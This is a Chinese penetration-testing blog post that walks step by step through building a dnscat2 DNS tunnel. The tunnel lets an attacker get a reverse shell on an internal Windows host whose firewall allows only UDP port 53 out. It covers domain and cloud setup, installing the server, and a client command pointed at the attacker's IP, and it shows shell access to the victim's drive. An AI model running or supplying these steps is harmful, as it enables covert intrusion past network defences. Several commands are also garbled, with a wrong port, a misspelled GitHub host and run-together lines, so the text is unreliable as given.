内网渗透之DNS隧道技术

admin 2021年1月29日13:06:32评论182 views字数 1202阅读4分0秒阅读模式




声明:请勿利用文中相关技术非法测试,如因此产生的一切不良后果与文章作者及本公众号无关!


01


前言


在渗透目标中过程中,可能碰有些网络的防火墙设置只允许端口53的UDP流量,就不能通过tcp搭建隧道,这种情况下我们可以通过UDP搭建DNS隧道,具体实现是通过搭建一个DNS服务器委派的子域,这个子域因为是我们自己搭建的主机,这时候就可以通过这个子域搭建DNS隧道,和网络被限制的主机进行交互。

02


购买域名并配置A记录和NS记录



内网渗透之DNS隧道技术


(注意)如果是阿里云服务器一定记得要配置下安全组策略,出口和入口配置允许53端口,不然监听不到53端口过来的流量,操作如下图所示:

内网渗透之DNS隧道技术


出方向配置自定义udp类型,端口53、任意地址连接【0.0.0.0】

内网渗透之DNS隧道技术


入方向配置自定义udp类型,端口53、任意地址连接【0.0.0.0】

内网渗透之DNS隧道技术


03


测试是否解析到服务器



1、测试下A记录是否解析成功

ping 配置域名

内网渗透之DNS隧道技术


2、测试下ns记录是否解析成功

内网渗透之DNS隧道技术


在VPS服务器上进行抓包(端口53号端口UDP)

tcpdump -n -i eth0 dst port 5


tcpdump:是一个运行在命令行下的抓包工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包

-n :将每个监听到数据包中的域名转换成IP地址后显示,不把网络地址转换成名字

-i :指定监听的网络接口

内网渗透之DNS隧道技术


04


安装dnscat2



在VPS服务器上安装dnscat2服务端,因为服务端是用ruby语言编写的,所以需要配置ruby环境,我使用的是unbuntu服务器,所以需要安装下以下依然包和环境

apt-get install gemapt-get install ruby-devapt-get install libpq-devapt-get install ruby-bundler

从github上下载dnscat2,并编译
apt-get insatll gitgit clone https://githun.com/iagox86/dnscat2.gitcd dnscat2/serverbundle insatll

 

内网渗透之DNS隧道技术


编译完成

内网渗透之DNS隧道技术


接下来就是启动服务端了

ruby ./dnscat2.rb --dns "domain=localhost,host=127.0.0.1,port=53" --no-cache

内网渗透之DNS隧道技术


启动客户端

dnscat2-v0.07-client-win32.exe --dns server=攻击者的IP --secret=攻击者服务器生成的ID

内网渗透之DNS隧道技术


成功反弹shell

内网渗透之DNS隧道技术


客户端和服务端建立连接后服务端处于交互模式,输入session命令可以查看当前控制的进程(每个连接都是独立的进程)。输入shell命令打开另一个会话,建立一个交互模式

内网渗透之DNS隧道技术


dir查看c盘目录下面的目录

内网渗透之DNS隧道技术


- 往期推荐 -



MSSQL注入DNS带外问题解决

Metasploit内网使用三种方法

记一次漏洞组合拳拿下内网

【推荐书籍】

本文始发于微信公众号(贝塔安全实验室):内网渗透之DNS隧道技术

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年1月29日13:06:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透之DNS隧道技术http://cn-sec.com/archives/172056.html

发表评论

匿名网友 填写信息